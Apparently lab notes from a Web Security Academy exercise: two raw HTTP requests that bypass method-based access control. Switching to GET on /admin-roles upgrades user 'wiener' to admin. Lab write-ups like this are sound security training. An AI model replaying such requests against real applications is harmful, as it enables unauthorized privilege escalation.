// 1 (Response is missing parameter; indicates support GET method)
GET /admin-roles HTTP/1.1
Host: acd91f781fcb2f35808d28e700a800c8.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acd91f781fcb2f35808d28e700a800c8.web-security-academy.net/admin
Connection: close
Cookie: session=SmM0htqIk5cZO4VhCao3XVf9rIGLSg8f
Upgrade-Insecure-Requests: 1

// 2
GET /admin-roles?username=wiener&action=upgrade HTTP/1.1
Host: acd91f781fcb2f35808d28e700a800c8.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acd91f781fcb2f35808d28e700a800c8.web-security-academy.net/login
Connection: close
Cookie: session=SmM0htqIk5cZO4VhCao3XVf9rIGLSg8f
Upgrade-Insecure-Requests: 1
